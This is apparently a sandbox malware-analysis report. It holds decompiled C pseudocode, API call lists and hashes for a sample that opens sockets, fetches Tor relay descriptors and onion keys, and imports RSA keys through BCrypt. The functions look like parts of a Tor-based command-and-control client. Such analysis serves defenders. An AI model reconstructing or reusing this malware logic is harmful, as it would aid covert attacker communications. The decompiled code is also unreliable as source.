                            0x00403ce7
                            0x00403cee
                            0x00403cef
                            0x00403cf1
                            0x00403d09
                            0x00403d11
                            0x00403d17
                            0x00403d21
                            0x00403d2e
                            0x00403d36
                            0x00403d37
                            0x00403d3c
                            0x00403d3f
                            0x00403d41
                            0x00403d49
                            0x00403d4a
                            0x00403d52
                            0x00403d53
                            0x00403d6e
                            0x00403d7b
                            0x00403d80
                            0x00403d86
                            0x00403d90
                            0x00403d9a
                            0x00403db4
                            0x00403db9
                            0x00403dbb
                            0x00403dc3
                            0x00403dc4
                            0x00403dc6
                            0x00403dce
                            0x00403dd5
                            0x00403dd6
                            0x00403dd8
                            0x00403df0
                            0x00403dfc
                            0x00403e0c
                            0x00403e22
                            0x00000000
                            0x00403e27
                            0x00403c24
                            0x00403e2d

                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00403B93
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00403BB1
                            • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 00403C6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$BinaryString$DecodeObject
                            • String ID: BCryptEncrypt$BCryptImportKey$BCryptImportKeyPair$KDBM$KeyDataBlob$RSA1$RSAPUBLICBLOB$SHA1$bcrypt.dll
                            • API String ID: 698452922-2403945854
                            • Opcode ID: 668f16dc7a28e8bcec46c01dbc8b6c25b945ec28d88d497ae00b659f07542f3b
                            • Instruction ID: 61e6e54592002671a450bf31de14366d9195710af4aa8c0c2f2e2d228943c6a7
                            • Opcode Fuzzy Hash: 668f16dc7a28e8bcec46c01dbc8b6c25b945ec28d88d497ae00b659f07542f3b
                            • Instruction Fuzzy Hash: 89711DB294021CBAEB21DF91CC46FDA777CAB04704F1045AAB709B60C1D7B5AB948F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00404A1A(void* __eflags, intOrPtr _a4) {
                            				void* _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void* _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v40;
                            				char _v41;
                            				char _v42;
                            				char _v43;
                            				char _v44;
                            				char _v45;
                            				char _v46;
                            				char _v47;
                            				char _v48;
                            				char _v49;
                            				signed int _v51;
                            				signed int _v52;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				intOrPtr _v88;
                            				short _v90;
                            				char _v92;
                            				char _v96;
                            				char _v112;
                            				char _v116;
                            				short _v118;
                            				char _v120;
                            				char _v128;
                            				char _v140;
                            				char _v144;
                            				intOrPtr _v148;
                            				intOrPtr _v152;
                            				char _v156;
                            				char _v160;
                            				signed short _t194;
                            				signed short _t206;
                            				char* _t215;
                            				char* _t220;
                            				intOrPtr _t229;
                            				signed int _t230;
                            				signed int _t233;
                            				intOrPtr* _t238;
                            				signed int _t239;
                            				char* _t240;
                            				intOrPtr _t241;
                            				intOrPtr _t242;
                            				void* _t244;
                            
                            				E004066D2( &_v160,  &_v16 - _t244);
                            				_t241 = _a4;
                            				E0040664B(_t241 + 0x180,  &_v32, 4);
                            				E0040664B(_t241 + 0x184,  &_v16, 4);
                            				E0040664B(_t241 + 0x188,  &_v24, 4);
                            				E0040664B(_t241 + 0x18c,  &_v8, 4);
                            				E0040664B(_t241 + 0x190,  &_v20, 4);
                            				E0040664B(_t241 + 0x194,  &_v56, 4);
                            				E0040664B(_t241 + 0x198,  &_v64, 4);
                            				E0040664B(_t241 + 0x19c,  &_v68, 4);
                            				E0040664B(_t241 + 0x1a0,  &_v72, 4);
                            				E0040664B(_t241 + 0x1a4,  &_v76, 4);
                            				E0040664B(_t241 + 0x1a8,  &_v60, 4);
                            				_t233 = _v16;
                            				_t238 = _v8;
                            				_v28 =  *((intOrPtr*)(_t238 + _t233 * 4));
                            				_v12 =  *_t238;
                            				_v52 = _t233;
                            				_v51 = 0xa;
                            				_v49 = 5;
                            				_v48 = 1;
                            				_v47 = 0;
                            				_v46 = 1;
                            				_v45 = 0;
                            				_v44 = 0;
                            				_v43 = 0;
                            				_v42 = 0;
                            				_v41 = 0;
                            				_v40 = 0;
                            				_v92 = 2;
                            				_t246 =  *((char*)(_t241 + 7)) - 3;
                            				if( *((char*)(_t241 + 7)) != 3) {
                            					__eflags =  *((char*)(_t241 + 7)) - 1;
                            					if( *((char*)(_t241 + 7)) != 1) {
                            						__eflags =  *((char*)(_t241 + 7)) - 4;
                            						if( *((char*)(_t241 + 7)) != 4) {
                            							L14:
                            							_t242 = _v8;
                            							_t230 = _v16;
                            							_t239 = _v51 & 0x0000ffff;
                            							E00405F3C(0x40908b, 0x32,  &_v52, 3);
                            							E00405F3C(0x40908b, 0x32,  &_v49, _t239);
                            							_t99 = _t239 + 3; // 0xd
                            							E00406381(_v12, _v76, _v24,  &_v52, _t99, _v72, _v68, _v64, 2, _v56, _v60);
                            							E00405F3C(0x40908b, 0x32,  &_v52, 3);
                            							_t194 = E00405F3C(0x40908b, 0x32,  &_v49, _t239);
                            							if(_v48 != 0) {
                            								L24:
                            								 *((intOrPtr*)(_t242 + _t230 * 4)) = 0;
                            								E004064B7(_t194, _v28);
                            								_v51 = 0;
                            								E00405F3C(0x40908b, 0x32,  &_v52, 3);
                            								E00406381(_v12, _v76, _v24,  &_v52, 3, _v72, _v68, _v64, 2, _v56, _v60);
                            								E004048E1( &_v20);
                            								 *((intOrPtr*)(_v32 + _t230 * 4)) = 0;
                            								return 0;
                            							}
                            							_t240 = _v20;
                            							while(1) {
                            								L16:
                            								while( *((intOrPtr*)(_t242 + _t230 * 4)) != 0) {
                            									E00406698(_v28, 0,  &_v140, 0, 0x64);
                            									_push( &_v128);
                            									_push(0);
                            									_push(0);
                            									_t194 =  &_v140;
                            									_push(_t194);
                            									_push(0);
                            									L0040717E();
                            									__eflags = _t194;
                            									if(__eflags == 0) {
                            										goto L16;
                            									}
                            									if(__eflags < 0) {
                            										goto L24;
                            									}
                            									_push(0);
                            									_push(0xfffa);
                            									_t206 = _t240 + 3;
                            									_push(_t206);
                            									_push(_v28);
                            									L00407178();
                            									_t194 = _t206;
                            									__eflags = _t194;
                            									if(_t194 == 0) {
                            										L21:
                            										goto L24;
                            									}
                            									__eflags = _t194 - 0xffffffff;
                            									if(_t194 != 0xffffffff) {
                            										 *(_t240 + 1) = _t194;
                            										 *_t240 = _v16;
                            										E00405F3C(0x40908b, 0x32, _t240, 3);
                            										E00405F3C(0x40908b, 0x32, _t240 + 3,  *(_t240 + 1) & 0x0000ffff);
                            										_t194 = E00406381(_v12, _v76, _v24, _t240, ( *(_t240 + 1) & 0x0000ffff) + 3, _v72, _v68, _v64, 2, _v56, _v60);
                            										continue;
                            									}
                            									goto L21;
                            								}
                            								goto L24;
                            							}
                            						}
                            						_v120 = 0x17;
                            						_v116 = 0;
                            						_v96 = 0;
                            						_v118 =  *((intOrPtr*)(_t241 + 0x18));
                            						E0040664B(_t241 + 8,  &_v112, 0x10);
                            						L8:
                            						_v144 = 1;
                            						_t215 =  &_v144;
                            						_push(_t215);
                            						_push(0x8004667e);
                            						_push(_v28);
                            						L00407172();
                            						if(_t215 == 0) {
                            							if( *((char*)(_t241 + 7)) == 4) {
                            								_push(0x1c);
                            								_push( &_v120);
                            								_push(_v28);
                            								L0040715A();
                            							} else {
                            								_push(0x10);
                            								_push( &_v92);
                            								_push(_v28);
                            								L0040715A();
                            							}
                            							E00406698(_v28, 0,  &_v140, 0xa, 0);
                            							_push( &_v128);
                            							_push(0);
                            							_t220 =  &_v140;
                            							_push(_t220);
                            							_push(0);
                            							_push(0);
                            							L0040717E();
                            							if(_t220 == 1) {
                            								_v144 = 0;
                            								_push( &_v144);
                            								_push(0x8004667e);
                            								_push(_v28);
                            								L00407172();
                            								_v156 = 1;
                            								_v152 = 0xea60;
                            								_v148 = 0x2710;
                            								_push(0);
                            								_push(0);
                            								_push( &_v160);
                            								_push(0);
                            								_push(0);
                            								_push(0xc);
                            								_push( &_v156);
                            								_push(0x98000004);
                            								_push(_v28);
                            								L004071A2();
                            								_v48 = 0;
                            							}
                            						}
                            						goto L14;
                            					}
                            					_v88 =  *((intOrPtr*)(_t241 + 8));
                            					_v90 =  *((intOrPtr*)(_t241 + 0xc));
                            					goto L8;
                            				}
                            				_v90 =  *((intOrPtr*)(0 + _t241 + 9));
                            				 *((char*)(0 + _t241 + 9)) = 0;
                            				_t229 = E00406558(_t246, _t241 + 9, 2);
                            				if(_t229 == 0) {
                            					goto L14;
                            				} else {
                            					_v88 = _t229;
                            					goto L8;
                            				}
                            			}
























































                            0x00404a31
                            0x00404a36
                            0x00404a46
                            0x00404a58
                            0x00404a6a
                            0x00404a7c
                            0x00404a8e
                            0x00404aa0
                            0x00404ab2
                            0x00404ac4
                            0x00404ad6
                            0x00404ae8
                            0x00404afa
                            0x00404aff
                            0x00404b02
                            0x00404b08
                            0x00404b0d
                            0x00404b10
                            0x00404b13
                            0x00404b19
                            0x00404b1d
                            0x00404b21
                            0x00404b25
                            0x00404b29
                            0x00404b2d
                            0x00404b31
                            0x00404b35
                            0x00404b39
                            0x00404b3d
                            0x00404b41
                            0x00404b47
                            0x00404b4b
                            0x00404b78
                            0x00404b7c
                            0x00404b8e
                            0x00404b92
                            0x00404ca5
                            0x00404ca5
                            0x00404ca8
                            0x00404cab
                            0x00404cbc
                            0x00404ccd
                            0x00404ce3
                            0x00404cf4
                            0x00404d06
                            0x00404d17
                            0x00404d20
                            0x00404dda
                            0x00404dda
                            0x00404de4
                            0x00404de9
                            0x00404dfc
                            0x00404e21
                            0x00404e2a
                            0x00404e32
                            0x00404e42
                            0x00404e42
                            0x00404d26
                            0x00404d29
                            0x00404d29
                            0x00404dd0
                            0x00404d3e
                            0x00404d46
                            0x00404d47
                            0x00404d49
                            0x00404d4b
                            0x00404d51
                            0x00404d52
                            0x00404d54
                            0x00404d59
                            0x00404d5b
                            0x00000000
                            0x00000000
                            0x00404d5d
                            0x00000000
                            0x00000000
                            0x00404d5f
                            0x00404d61
                            0x00404d66
                            0x00404d69
                            0x00404d6a
                            0x00404d6d
                            0x00404d72
                            0x00404d72
                            0x00404d74
                            0x00404d7b
                            0x00000000
                            0x00404d7b
                            0x00404d76
                            0x00404d79
                            0x00404d7f
                            0x00404d86
                            0x00404d96
                            0x00404da7
                            0x00404dcb
                            0x00000000
                            0x00404dcb
                            0x00000000
                            0x00404d79
                            0x00000000
                            0x00404dd0
                            0x00404d29
                            0x00404b94
                            0x00404b9a
                            0x00404ba1
                            0x00404bac
                            0x00404bba
                            0x00404bc6
                            0x00404bc6
                            0x00404bd0
                            0x00404bd6
                            0x00404bd7
                            0x00404bdc
                            0x00404bdf
                            0x00404be6
                            0x00404bf0
                            0x00404c02
                            0x00404c07
                            0x00404c08
                            0x00404c0b
                            0x00404bf2
                            0x00404bf2
                            0x00404bf7
                            0x00404bf8
                            0x00404bfb
                            0x00404bfb
                            0x00404c20
                            0x00404c28
                            0x00404c29
                            0x00404c2b
                            0x00404c31
                            0x00404c32
                            0x00404c34
                            0x00404c36
                            0x00404c3e
                            0x00404c40
                            0x00404c50
                            0x00404c51
                            0x00404c56
                            0x00404c59
                            0x00404c5e
                            0x00404c68
                            0x00404c72
                            0x00404c7c
                            0x00404c7e
                            0x00404c86
                            0x00404c87
                            0x00404c89
                            0x00404c8b
                            0x00404c93
                            0x00404c94
                            0x00404c99
                            0x00404c9c
                            0x00404ca1
                            0x00404ca1
                            0x00404c3e
                            0x00000000
                            0x00404be6
                            0x00404b81
                            0x00404b88
                            0x00000000
                            0x00404b88
                            0x00404b57
                            0x00404b5b
                            0x00404b66
                            0x00404b6d
                            0x00000000
                            0x00404b73
                            0x00404b73
                            0x00000000
                            0x00404b73

                            APIs
                            • ioctlsocket.WSOCK32(?,8004667E,00000001,?,?,00000010,?,?,00000004,?,?,00000004,?,?,00000004,?), ref: 00404BDF
                            • connect.WSOCK32(?,00000002,00000010,?,8004667E,00000001,?,?,00000010,?,?,00000004,?,?,00000004,?), ref: 00404BFB
                            • connect.WSOCK32(?,00000017,0000001C,?,8004667E,00000001,?,?,00000010,?,?,00000004,?,?,00000004,?), ref: 00404C0B
                            • select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C,?,8004667E,00000001), ref: 00404C36
                            • ioctlsocket.WSOCK32(?,8004667E,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C), ref: 00404C59
                            • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00404C9C
                              • Part of subcall function 00406558: getaddrinfo.WS2_32(?,00000000,?,?), ref: 004065A0
                            • select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,0040908B,00000032,00000005,0000000A,0040908B,00000032), ref: 00404D54
                            • recv.WSOCK32(?,?,0000FFFA,00000000,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,0040908B,00000032), ref: 00404D6D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: connectioctlsocketselect$Ioctlgetaddrinforecv
                            • String ID: `
                            • API String ID: 3309496413-1850852036
                            • Opcode ID: 04230ac3f178ca70e3ad71c852305ce5690f417b780a517f9c842ec35ce5e0c6
                            • Instruction ID: 2d9023ba1f77d38e37bf4f481558d755ca0deba1584760c4f9d99873fe015a67
                            • Opcode Fuzzy Hash: 04230ac3f178ca70e3ad71c852305ce5690f417b780a517f9c842ec35ce5e0c6
                            • Instruction Fuzzy Hash: FFD12DB1940208BAEB11EBE0CC41FDEBBBCAF04704F10446AF755B61D1D779AA54CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00673DE3
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00673E01
                            • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 00673EBC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$BinaryString$DecodeObject
                            • String ID: KDBM$KeyDataBlob$RSA1$RSAPUBLICBLOB$SHA1
                            • API String ID: 698452922-1412799199
                            • Opcode ID: f4cc697524efcae6d15d3c0e42b652e99e6bf05930db6e837f3f8ff849eb5f90
                            • Instruction ID: 9ef108e14e18a2f9055d56c5029dbcd7d2aa52418d1097e4bc635d62d8f1bbce
                            • Opcode Fuzzy Hash: f4cc697524efcae6d15d3c0e42b652e99e6bf05930db6e837f3f8ff849eb5f90
                            • Instruction Fuzzy Hash: 1F712FB294021CBAEB61DF50CC46FDA777DAB04704F1081AAB708B61C1D7B5AF848F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00404065(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, BYTE* _a16) {
                            				char _v16;
                            				char _v501;
                            				char _v516;
                            				char _v520;
                            				intOrPtr _v524;
                            				int _v532;
                            				intOrPtr _t35;
                            				void* _t39;
                            				void* _t40;
                            				void* _t41;
                            				char* _t43;
                            				char _t53;
                            				void* _t54;
                            				char* _t56;
                            				void* _t59;
                            				void* _t60;
                            
                            				_t60 = __eflags;
                            				E004066D2( &_v532,  &_v16 - _t59);
                            				E0040664B("/tor/server/fp/",  &_v516, 0xf);
                            				E00406A63(_a12, 0x14,  &_v501);
                            				_t35 = E00402A45(__edx, _t60, _a4, _a8,  &_v516,  &_v520);
                            				_t61 = _t35;
                            				if(_t35 != 0) {
                            					_t53 = _v520;
                            					_v524 = _t35;
                            					_t39 = E004069DA(_t61, _t53, _v524, "onion-key");
                            					_t62 = _t39;
                            					if(_t39 != 0) {
                            						_t40 = _t39 - _t53;
                            						_t54 = _t53 + _t40;
                            						_v524 = _v524 - _t40;
                            						_t41 = E004069DA(_t62, _t54, _v524, "-----BEGIN RSA PUBLIC KEY-----");
                            						_t63 = _t41;
                            						if(_t41 != 0) {
                            							_t42 = _t41 - _t54;
                            							_v524 = _v524 - _t41 - _t54;
                            							_t43 = E004069DA(_t63, _t54 + _t42, _v524, "-----END");
                            							if(_t43 != 0) {
                            								_t56 =  &_v516;
                            								 *_t43 = 0;
                            								while(1) {
                            									asm("lodsb");
                            									if(_t43 > 0x20) {
                            										asm("stosb");
                            									}
                            									if(_t43 == 0) {
                            										break;
                            									}
                            								}
                            								 *_t56 = 0;
                            								CryptStringToBinaryA( &_v516, 0, 1, 0,  &_v532, 0, 0);
                            								CryptStringToBinaryA( &_v516, 0, 1, _a16,  &_v532, 0, 0);
                            							}
                            						}
                            					}
                            				}
                            				E004048E1( &_v520);
                            				return _v532;
                            			}



















                            0x00404065
                            0x0040407c
                            0x0040408f
                            0x004040a0
                            0x004040b9
                            0x004040be
                            0x004040c0
                            0x004040c6
                            0x004040cc
                            0x004040de
                            0x004040e3
                            0x004040e5
                            0x004040eb
                            0x004040ed
                            0x004040ef
                            0x00404101
                            0x00404106
                            0x00404108
                            0x0040410a
                            0x0040410e
                            0x00404120
                            0x00404127
                            0x0040412e
                            0x00404134
                            0x00404137
                            0x00404137
                            0x0040413a
                            0x0040413c
                            0x0040413c
                            0x0040413f
                            0x00000000
                            0x00000000
                            0x00404141
                            0x00404143
                            0x0040415e
                            0x0040417c
                            0x0040417c
                            0x00404127
                            0x00404108
                            0x004040e5
                            0x00404188
                            0x00404197

                            APIs
                              • Part of subcall function 00402A45: wsprintfA.USER32 ref: 00402A94
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040415E
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040417C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString$wsprintf
                            • String ID: -----BEGIN RSA PUBLIC KEY-----$-----END$/tor/server/fp/$onion-key
                            • API String ID: 2962846386-2989486038
                            • Opcode ID: 0c9f6bc0f63c195c15a47a39b66e0893d43bf303b5a0f0ccb0ae6f4d256fa922
                            • Instruction ID: 6e5008c48d5bf08edfcdfbb1d27b503a37780c4a99c1ba39e49f0b454b60a287
                            • Opcode Fuzzy Hash: 0c9f6bc0f63c195c15a47a39b66e0893d43bf303b5a0f0ccb0ae6f4d256fa922
                            • Instruction Fuzzy Hash: 5731A472A403197AEB219A61CC49FEE776CAB54304F0404BABA14F61D2DB749E908F69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _lopen.KERNEL32(00000000,00000000), ref: 00412D9C
                            • BuildCommDCBAndTimeoutsA.KERNEL32(00000000,?,?), ref: 00412DD1
                            • GetPriorityClass.KERNEL32(00000000), ref: 00412DE4
                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00412DF8
                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00412E00
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: BuildClassCommConsoleModePriorityResourceSizeofTimeouts_lopen
                            • String ID:
                            • API String ID: 3467152227-0
                            • Opcode ID: e4549aee9e34046f68ef9d5e043c18de0a48f9901b22678f612b60ed75d12b10
                            • Instruction ID: 761be98b9e4883c95a80aed26ab8d4a6d3007fda60e61a6e682db6f4c00aa008
                            • Opcode Fuzzy Hash: e4549aee9e34046f68ef9d5e043c18de0a48f9901b22678f612b60ed75d12b10
                            • Instruction Fuzzy Hash: 1401A5B2D01118BFD7009BA9EE849DFBBBCEB98345B110436E602E2150C3B8AD5487AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00401D6D() {
                            				signed int _t590;
                            				signed int _t620;
                            				signed int _t622;
                            				signed int _t626;
                            				int _t628;
                            				signed int _t634;
                            				signed int _t641;
                            				intOrPtr _t646;
                            				signed int _t652;
                            				char _t653;
                            				signed int _t660;
                            				signed int _t687;
                            				signed int _t692;
                            				signed int _t712;
                            				signed int _t714;
                            				int _t720;
                            				signed int _t721;
                            				signed int _t729;
                            				signed int _t732;
                            				signed int _t736;
                            				signed int _t737;
                            				signed int _t742;
                            				intOrPtr _t750;
                            				void* _t752;
                            				signed int _t756;
                            				signed int _t764;
                            				signed int _t783;
                            				signed int _t785;
                            				intOrPtr _t800;
                            				char _t801;
                            				signed int _t809;
                            				signed int _t821;
                            				signed int _t879;
                            				signed int _t881;
                            				signed int _t883;
                            				signed int _t893;
                            				signed int _t895;
                            				signed int _t896;
                            				signed int _t897;
                            				signed int _t898;
                            				void* _t900;
                            				signed int _t901;
                            				signed int _t903;
                            				void* _t906;
                            				signed int _t907;
                            				int _t910;
                            				signed int _t915;
                            				signed int _t919;
                            				char _t923;
                            				void* _t926;
                            				char* _t932;
                            				void* _t940;
                            				char* _t942;
                            				char* _t943;
                            				char* _t944;
                            				char* _t945;
                            				char* _t946;
                            				intOrPtr _t947;
                            				char* _t948;
                            				BYTE* _t949;
                            				char* _t950;
                            				char* _t951;
                            				char* _t955;
                            				char* _t956;
                            				char* _t957;
                            				void* _t959;
                            				char* _t960;
                            				intOrPtr _t963;
                            				void* _t964;
                            				void* _t966;
                            
                            				while(1) {
                            					L116:
                            					 *(_t964 - 0x6a8) =  *(_t964 - 0x6a8) + 1;
                            					L118:
                            					while( *(_t964 - 0x6a8) <= 4) {
                            						_t938 = E00403F5D( *((intOrPtr*)(_t964 - 0x23c)), E00406A32(_t583,  *((intOrPtr*)(_t964 - 0x6a0))), 0);
                            						_t583 = E00403FA5(_t585);
                            						__eflags =  *(_t964 - 0x6a8);
                            						if( *(_t964 - 0x6a8) != 0) {
                            							L3:
                            							__eflags =  *(_t964 - 0x6a8) - 1;
                            							if( *(_t964 - 0x6a8) != 1) {
                            								L5:
                            								__eflags =  *(_t964 - 0x6a8) - 2;
                            								if( *(_t964 - 0x6a8) != 2) {
                            									L7:
                            									__eflags =  *(_t964 - 0x6a8) - 4;
                            									if(__eflags != 0) {
                            										L9:
                            										_t590 = E00403EA6(__eflags, _t938, _t964 +  *(_t964 - 0x6a8) * 4 - 0x6dc, _t964 +  *(_t964 - 0x6a8) * 4 - 0x6f0, _t964 +  *(_t964 - 0x6a8) * 4 - 0x704, _t964 +  *(_t964 - 0x6a8) * 4 - 0x718);
                            										_t583 = _t590;
                            										__eflags = _t590;
                            										if(_t590 != 0) {
                            											continue;
                            										}
                            										__eflags =  *(_t964 - 0x6a8) - 1;
                            										if( *(_t964 - 0x6a8) != 1) {
                            											L12:
                            											__eflags =  *(_t964 - 0x6a8) - 4;
                            											if(__eflags != 0) {
                            												__eflags =  *(_t964 - 0x6a8) - 3;
                            												if( *(_t964 - 0x6a8) != 3) {
                            													__eflags =  *(_t964 - 0x6a8) - 2;
                            													if(__eflags != 0) {
                            														__eflags =  *(_t964 - 0x6a8);
                            														if(__eflags != 0) {
                            															while(1) {
                            																L116:
                            																 *(_t964 - 0x6a8) =  *(_t964 - 0x6a8) + 1;
                            																goto L118;
                            															}
                            														}
                            														__eflags = E00402FB6(_t929, __eflags,  *((intOrPtr*)(_t964 - 0x6f0)),  *((intOrPtr*)(_t964 - 0x704)),  *((intOrPtr*)(_t964 + 0x10)),  *((intOrPtr*)(_t964 + 0x14)), _t964 - 0x764);
                            														if(__eflags == 0) {
                            															goto L117;
                            														}
                            														E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)), 0x4092a0, 7, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            														 *(_t964 - 0x760) = 0;
                            														_t620 = E004048B6(0x186a0, _t964 - 0x77c);
                            														__eflags = _t620;
                            														if(_t620 == 0) {
                            															goto L117;
                            														}
                            														_t622 = E004048B6(0x186a0, _t964 - 0x780);
                            														__eflags = _t622;
                            														if(_t622 == 0) {
                            															goto L117;
                            														}
                            														_t940 =  *(_t964 - 0x77c);
                            														 *(_t964 - 0x24) = 0;
                            														 *(_t964 - 0x2c) = 0;
                            														while(1) {
                            															E00406698( *((intOrPtr*)(_t964 - 0x764)), 0, _t964 - 0x778, 0xa, 0);
                            															_push(_t964 - 0x76c);
                            															_push(0);
                            															_push(0);
                            															_t626 = _t964 - 0x778;
                            															_push(_t626);
                            															_push(0);
                            															L0040717E();
                            															__eflags = _t626;
                            															if(__eflags <= 0) {
                            																goto L117;
                            															}
                            															_t628 = E004045B9(__eflags,  *((intOrPtr*)(_t964 - 0x764)), _t964 - 0x760,  *((intOrPtr*)(_t964 + 0x10)));
                            															__eflags = _t628;
                            															if(_t628 <= 0) {
                            																goto L117;
                            															}
                            															 *(_t964 - 0x24) =  *(_t964 - 0x24) + _t628;
                            															_t959 =  *(_t964 - 0x760);
                            															_t910 = _t628;
                            															memcpy(_t940, _t959, _t910);
                            															_t966 = _t966 + 0xc;
                            															_t940 = _t959 + _t910 + _t910;
                            															E004048E1(_t964 - 0x760);
                            															__eflags =  *(_t964 - 0x24) - 0x202;
                            															if( *(_t964 - 0x24) < 0x202) {
                            																continue;
                            															}
                            															_t929 =  *(_t964 - 0x77c);
                            															_t634 =  *(_t929 + 0x10) & 0x0000ffff;
                            															__eflags = _t634 + 0x19 -  *(_t964 - 0x24);
                            															if(_t634 + 0x19 >  *(_t964 - 0x24)) {
                            																continue;
                            															}
                            															_t915 =  *(_t634 + _t929 + 0x17) & 0x0000ffff;
                            															__eflags =  *(_t964 - 0x24) - _t915 + _t634 + 0x21b;
                            															if( *(_t964 - 0x24) != _t915 + _t634 + 0x21b) {
                            																continue;
                            															}
                            															E004066E9( *((intOrPtr*)(_t964 + 8)), 0xa, _t964 - 0x63c);
                            															asm("bswap eax");
                            															_t641 =  *((intOrPtr*)(_t940 - 0x1fd)) + ( *(_t964 - 0x63c) & 0x000000ff) * 0x15180 / 0x100;
                            															_t929 = _t641 % 0x15180;
                            															asm("bswap eax");
                            															 *(_t964 - 0x61e) = _t641 / 0x15180;
                            															E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            															_t963 =  *((intOrPtr*)(_t964 - 0x780));
                            															 *((char*)(_t963 + 4)) = 8;
                            															_t646 = E0040664B(_t940 - 0x1fd, _t963 + 5, 4);
                            															 *((short*)(_t963 + 9)) = 0x404;
                            															_push( *((intOrPtr*)(_t964 - 0x6f0)));
                            															L00407166();
                            															 *((intOrPtr*)(_t963 + 0xb)) = _t646;
                            															 *((intOrPtr*)(_t963 + 0xf)) = 0x40401;
                            															_t583 = E00404484(__eflags,  *((intOrPtr*)(_t964 - 0x764)), _t963, 0x202, 0,  *((intOrPtr*)(_t964 + 0x10)));
                            															while(1) {
                            																L116:
                            																 *(_t964 - 0x6a8) =  *(_t964 - 0x6a8) + 1;
                            																goto L118;
                            															}
                            														}
                            														goto L117;
                            													}
                            													_t652 = E00403422(__eflags,  *((intOrPtr*)(_t964 - 8)),  *(_t964 - 4),  *((intOrPtr*)(_t964 - 0xc)),  *((intOrPtr*)(_t964 - 0x10)),  *((intOrPtr*)(_t964 + 0x10)),  *((intOrPtr*)(_t964 - 0x764)),  *((intOrPtr*)(_t964 - 0x6ec)),  *(_t964 - 0x714),  *((intOrPtr*)(_t964 - 0x6e8)),  *((intOrPtr*)(_t964 - 0x6fc)),  *((intOrPtr*)(_t964 - 0x6dc)),  *(_t964 - 0x6d4), 1, _t964 - 0x200, _t964 - 0x1fc, _t964 - 0x1f8, _t964 - 0x1f4, _t964 - 0x238);
                            													__eflags = _t652;
                            													if(_t652 <= 0) {
                            														goto L117;
                            													}
                            													_t653 = E004066D2( *((intOrPtr*)(_t964 - 0x780)), 0x186a0);
                            													_t942 =  *((intOrPtr*)(_t964 - 0x780));
                            													 *_t942 = 0x80;
                            													 *((char*)(_t942 + 3)) = 1;
                            													 *((char*)(_t942 + 4)) = 3;
                            													 *((char*)(_t942 + 5)) = 0x21;
                            													 *((char*)(_t942 + 0xf)) = 0x14;
                            													_t919 = 0;
                            													while(1) {
                            														__eflags = _t919 - 0x14;
                            														if(_t919 >= 0x14) {
                            															break;
                            														}
                            														 *[ss:ecx+ebp-0x650] = _t653;
                            														_t919 = _t919 + 1;
                            														__eflags = _t919;
                            													}
                            													E0040664B(_t964 - 0x650, _t942 + 0x10, 0x14);
